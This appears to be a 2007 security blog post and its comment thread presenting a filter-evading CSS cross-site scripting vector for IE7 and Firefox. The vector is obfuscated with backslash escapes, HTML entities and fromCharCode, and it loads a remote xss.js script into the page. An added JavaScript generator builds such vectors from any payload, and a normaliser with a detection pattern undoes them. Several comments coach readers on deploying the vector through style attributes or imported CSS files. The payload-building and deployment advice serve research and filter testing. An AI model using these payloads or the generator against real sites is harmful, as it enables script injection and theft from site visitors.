Here's a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector is based on the brilliant work of Martin, which I modified slightly; in doing so I found that IE will also decode HTML entities inside a style attribute, so the expression() part can be entity-encoded and a filter looking at the raw markup never sees the word "expression".
Credits update
The expression part of this technique was first demonstrated by Dan on the slackers forums. Nice one Dan, sorry for missing you from the credits.
<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);xx: e\
xp\re\s\s\
i\o\n((win
dow.r!=1) 
? eval('x=
String.fro
mCharCode;
scr=docume
nt.createE
lement(x(1
15,99,114,
105,112,11
6));scr.se
tAttribute
(x(115,114
,99),x(104
,116,116,1
12,58,47,4
7,98,117,1
15,105,110
,101,115,1
15,105,110
,102,111,4
6,99,111,4
6,117,107,
47,108,97,
98,115,47,
120,115,11
5,47,120,1
15,115,46,
106,115));
document.g
etElementB
yId(x( 105
,110,106,1
01,99,116 
)).appendC
hild(scr);
window.r=1
;') : 1);" id="inject">test</div>
Please use my tool Hackvertor if you need to decode the IE vector, as it will provide you with all the necessary conversions. Please note that the vector has been broken up onto multiple lines for viewing purposes; remove the line breaks when testing it.
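What follows is an added example in JavaScript, not code from the original post or from Hackvertor. The builder assembles the same layers the vector above uses, the -moz-binding half for Firefox and the entity-encoded expression() half for IE7, from a plain payload; the normaliser then strips those layers off in the order the browser applies them (HTML entity decoding, then CSS backslash escapes, then String.fromCharCode folding), which is what a filter has to do before it can look for "expression" or "-moz-binding". The example.test hostnames, the xss.js path and the DANGEROUS pattern are placeholders for illustration, not anything from the post.

```javascript
// Added example, not from the original post or Hackvertor. Builds the
// style-attribute vector from a plain payload and normalises such a vector
// back to readable CSS. Hostnames and paths below are placeholders.

// CSS reads "\" + any non-hex character as that literal character, so
// "\-\m\o\z..." still parses as "-moz-binding" while no longer matching a
// naive substring filter. Hex digits are left alone because "\b" would start
// a hex escape; the original vector avoids those positions for the same reason.
function backslashObfuscate(ident) {
  return Array.from(ident, ch => (/[0-9a-fA-F]/.test(ch) ? ch : '\\' + ch)).join('');
}

// Argument list for String.fromCharCode, so the script URL carries no quotes,
// dots or slashes that a value filter might key on.
function toCharCodes(s) {
  return Array.from(s, ch => ch.charCodeAt(0)).join(',');
}

// HTML hex entities: an attribute value is entity-decoded by the HTML parser
// before the CSS parser sees it, so "expression(" never appears in the markup.
function toHexEntities(s) {
  return Array.from(s, ch => '&#x' + ch.charCodeAt(0).toString(16) + ';').join('');
}

// Value for the style attribute. The window.r guard (Dan's trick, credited in
// the post) matters because IE re-evaluates expression() continually; without
// it a new <script> element would be appended on every re-evaluation.
function buildVector(xblUrl, scriptUrl, targetId) {
  const js =
    'x=String.fromCharCode;' +
    'scr=document.createElement(x(' + toCharCodes('script') + '));' +
    'scr.setAttribute(x(' + toCharCodes('src') + '),x(' + toCharCodes(scriptUrl) + '));' +
    'document.getElementById(x(' + toCharCodes(targetId) + ')).appendChild(scr);' +
    'window.r=1;';
  const ieHalf = 'xx: ' + backslashObfuscate('expression') +
    "((window.r!=1) ? eval('" + js + "') : 1);";
  const ffHalf = backslashObfuscate('-moz-binding') + ':' +
    backslashObfuscate('url') + '(' + backslashObfuscate(xblUrl) + ');';
  return ffHalf + toHexEntities(ieHalf);
}

// --- Defender side: undo the layers in the order the browser applies them ---

function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCharCode(parseInt(d, 10)));
}

// "\" + 1-6 hex digits (+ optional single whitespace) is a code point;
// "\" + anything else is that character.
function cssUnescape(s) {
  return s.replace(/\\([0-9a-fA-F]{1,6})\s?|\\([\s\S])/g, (_, hex, ch) =>
    (hex ? String.fromCharCode(parseInt(hex, 16)) : ch));
}

// Fold String.fromCharCode(n,n,...) and any alias assigned from it
// (x=String.fromCharCode) back into quoted strings.
function foldCharCodes(js) {
  const alias = (js.match(/\b(\w+)\s*=\s*String\.fromCharCode\b/) || [])[1];
  const callRe = new RegExp(
    '(?:String\\.fromCharCode' + (alias ? '|\\b' + alias : '') + ')\\(\\s*([0-9,\\s]+)\\)', 'g');
  return js.replace(callRe, (_, list) =>
    '"' + list.split(',').map(n => String.fromCharCode(parseInt(n, 10))).join('') + '"');
}

function normalizeStyle(styleValue) {
  return foldCharCodes(cssUnescape(decodeEntities(styleValue)));
}

// Assumed detection policy: flag the constructs that turn CSS into script.
const DANGEROUS = /expression\s*\(|-moz-binding|behavior\s*:|javascript:|vbscript:/i;
function isDangerous(styleValue) {
  return DANGEROUS.test(normalizeStyle(styleValue));
}

const demo = buildVector('//example.test/xbl.xml#xss', 'http://example.test/xss.js', 'inject');
console.log(demo);                  // what a raw-markup filter sees: no "expression", no "-moz-binding"
console.log(normalizeStyle(demo));  // what the browser sees
console.log(isDangerous(demo));     // true
```

Run it with node: the first line printed contains neither "expression" nor "-moz-binding", the second is the plain CSS the browser would execute. The normaliser needs no browser; the same three steps are what a server-side filter or WAF rule has to perform on a style attribute before matching, and the backslash step alone defeats a signature that looks for the literal property name.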
Comments (28)

here are the sources
xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;
scr=document.createElement(x(115,99,114,105,112,116));
scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,98,117,115,105,110,101,115,115,105,110,102,111,46,99,111,46,117,107,47,108,97,98,115,47,120,115,115,47,120,115,115,46,106,115));
document.getElementById(x(105,110,106,101,99,116)).appendChild(scr);
window.r=1;') : 1);
n1
Posted 26 Nov 2007 at 3:59 pm

Hackvertor can now reconstruct this attack using the tag XSS->mozbindingexpression
and even add the backslashes for you.
Posted 26 Nov 2007 at 4:21 pm

Filter evasion->backslashesc
Very interesting,
Posted 26 Nov 2007 at 9:32 pm

Another great job Gareth!!
wow!
Posted 28 Nov 2007 at 7:09 am

Very nice work.
How do you use this code for XSS?
Eliena
Posted 02 Dec 2007 at 10:45 am

You need to remove the line breaks, and the code requires an id="inject" to work on IE7. It can be injected within most HTML tags using the style attribute.
Posted 02 Dec 2007 at 10:48 am

So, its main advantage is on sites that filter "script" tags. You still need to pass "<" and ">", right?
Posted 03 Dec 2007 at 12:22 am

Nope, you don't need "<" or ">" to use this injection, you just need a style attribute to inject.
Posted 03 Dec 2007 at 6:42 am

Many thanks for the credit for the window.r trick. I hope I didn't sound like I was specifically asking for credit on slackers; I was just trying to find out if I had come across the same trick as someone else or if it was an original idea. Nonetheless, I really appreciate the mention!
And damn, is that fine or what?! Nice work with that injection. A beautiful thing…
-Dan
Posted 10 Dec 2007 at 10:53 pm

Hey Dan, no probs, you contributed to the above vector so you deserve credit.
Posted 11 Dec 2007 at 6:48 am

<script>alert("test")</script>
Posted 11 Jan 2008 at 4:35 pm

@l0ad1ng_x
LOL!
Posted 11 Jan 2008 at 5:38 pm

Can you please show us the source of this XSS before it was "hackvertored"? I guess that's hex there, but I just don't find any way to reverse it.
Thanks
Posted 16 Jan 2008 at 8:29 pm

PS. Nice work, you guys.
Found some interesting thing here regarding this matter: hxxp://www.seo-blackhat.com/xss-cheat-sheet/
Posted 16 Jan 2008 at 8:30 pm

Sorry for the mess, but I don't know how to edit my post. | guess that's HEX there but I just don't find any way to reverse it. |*
Posted 16 Jan 2008 at 8:32 pm

@no.connexion
Hackvertor can also decode data, you know.
I've decoded it for you and can provide the code so you can enter your own:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PGRpdiBzdHlsZT0iXC1cbW9celwtYlxpXG5kXGluXGc6XHVybCgvL2J1c2luZXNzXGlcbmZvLmNvLnVrXC9sYWJzXC94YmxcL3hibFwueG1sXCN4c3MpOzxAaGV4X2VudD54eDogZVx4cFxyZVxzXHNcaVxvXG4oKHdpbmRvdy5yIT0xKSA%2FIGV2YWwoJ3g9U3RyaW5nLmZyb21DaGFyQ29kZTtzY3I9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCh4KDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTtzY3Iuc2V0QXR0cmlidXRlKHgoMTE1LDExNCw5OSkseCg8QHRvY2hhcmNvZGVzPmh0dHA6Ly9idXNpbmVzc2luZm8uY28udWsvbGFicy94c3MveHNzLmpzPEAvdG9jaGFyY29kZXM%2BKSk7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoeCggMTA1LDExMCwxMDYsMTAxLDk5LDExNiApKS5hcHBlbmRDaGlsZChzY3IpO3dpbmRvdy5yPTE7Jyk8QC9oZXhfZW50PiA6IDEpOyIgaWQ9ImluamVjdCI%2BdGVzdDwvZGl2Pg%3D%3D
Hackvertor also has XSS tags which allow you to construct this vector; go to Hackvertor->XSS->mozbindingexpression
Posted 17 Jan 2008 at 12:13 am

Thanks for the answer. Is it possible to use this XSS through a CSS file? What I've tried to do is to insert <link href="hxxp://wwwexample.com/css/xss.css"> and then <div class="somename" style="" id="inject">test</div> in HTML, and the xss.css should look like <<< .sometext {
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);x&#…1;') : 1);
} >>>
or maybe something like that: body {
background-image: url(’javascript:alert(”XSS”);’)
}
None of the above worked … maybe I'm doing something the wrong way, or it's just not going to work.
Posted 18 Jan 2008 at 2:33 am

@no.connexion
Yeah, it's possible to use it through a CSS file. In the file you need to define the rule as:-
body {
/* code here */
}
Then simply insert it as normal CSS through link or @import.
Posted 18 Jan 2008 at 9:17 am

Thanks for the response.
Here are my final thoughts.
Added in html the following:
…
<style type="text/css">
@import url(http://www.example.com/css/test.css);
</style>
</head>
<body>
<b> This IS a test </b>
</body>
…
and then in test.css:
…
b
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);<@hex_ent>xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(<@tocharcodes>http://businessinfo.co.uk/labs/xss/xss.js<@/tocharcodes>));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;')<@/hex_ent> : 1);
}
…
OR
in test.css
b
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27) : 1);
}
AND it works fine for Firefox but IE7 does nothing. I'm using 7.0.5730.13.
Posted 18 Jan 2008 at 2:50 pm

@no.connexion
Dude, you need to run "convert" in Hackvertor first before adding it to the page.
Posted 18 Jan 2008 at 3:30 pm

I guess I was using the converted version in my CSS here:
b
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27) : 1);
}
I didn't use all the converted code for obvious reasons. Can you please confirm that you've done this through CSS and it works? If yes, I'll stop asking and I'll work my ass off to make this work.
Posted 18 Jan 2008 at 3:55 pm

Yep, tested on IE and Firefox.
Posted 18 Jan 2008 at 3:57 pm

Please take a look in here:
Posted 20 Jan 2008 at 3:02 am

hxxp://noconnexion.wordpress.com/
coo000lllL :::::::: good work
Posted 02 Sep 2008 at 4:59 am

Firefox 3 fixed this XML hole?
Posted 09 Oct 2008 at 7:16 pm

Yeah, it's fixed in FF3 final. I think in the beta it was still in, but they removed it.
I thought it was possible to do it inline but Giorgio mentioned it's only available in chrome.
Posted 09 Oct 2008 at 8:03 pm

How can you stop people from writing these types of attacks to a CSS file when allowing people to write their own CSS files on your server?
Posted 13 Jan 2010 at 4:43 am

@sim
Validate the CSS using a CSS parser like AntiSamy.
Posted 13 Jan 2010 at 1:23 pm